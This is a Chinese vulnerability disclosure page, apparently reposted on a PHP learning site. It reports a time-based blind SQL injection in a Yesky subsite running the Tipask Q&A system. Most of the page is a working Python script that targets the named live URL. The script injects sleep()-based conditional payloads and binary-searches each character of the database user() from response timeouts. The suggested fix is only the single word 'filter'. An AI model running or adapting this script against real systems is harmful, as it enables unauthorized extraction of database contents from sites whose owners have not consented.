网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

天极网某分站存在SQL盲注漏洞 - 网站安全 - 自学php网

来源:未知    时间:2015-04-15 13:41 作者:xxadmin 阅读:

[导读] sql盲注.(附验证脚本) Tipask问答系统12个注射打包http://www.2cto.com/Article/201503/385448. html 的一个案例: url: http://product.yesky.com/wenda/index.php?question/ajaxgood/sleep(1)/ 测试脚本: #coding=utf-8 import...

sql盲注.(附验证脚本)

Tipask问答系统12个注射打包http://www.2cto.com/Article/201503/385448.html的一个案例:

url:

http://product.yesky.com/wenda/index.php?question/ajaxgood/sleep(1)/

测试脚本:

#coding=utf-8 
import sys,urllib2 
from optparse import OptionParser 
from urllib2 import Request,urlopen,URLError,HTTPError 
import urllib
import time 
result='' 

def request(URL): 
    #print URL 
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } 
    req = urllib2.Request(URL, None, user_agent)  
         
    try: 
        request = urllib2.urlopen(req,timeout=4) 
         
    except Exception ,e: 
        time.sleep(2)
        return 'timeout' 
         
    return request.read() 


def binary_sqli(left, right, index): 
   global result 
   while 1: 
        mid = (left + right)/2 
        if mid == left: 
            result += chr(mid) 
            print result 
            break 
        payload = "if(ascii(substring(user(),"+str(index)+",1))<"+str(mid)+",1,sleep(2))" 
        html = request('http://product.yesky.com/wenda/index.php?question/ajaxgood/'+payload+'/') 
        verify = 'timeout' 
        if verify not in html: 
            right = mid 
        else: 
            left = mid 
                   
if __name__ == '__main__': 
    for i in range(1,50): 
        binary_sqli(32, 127, i)



读取user():
 

1.png

解决方案:

过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论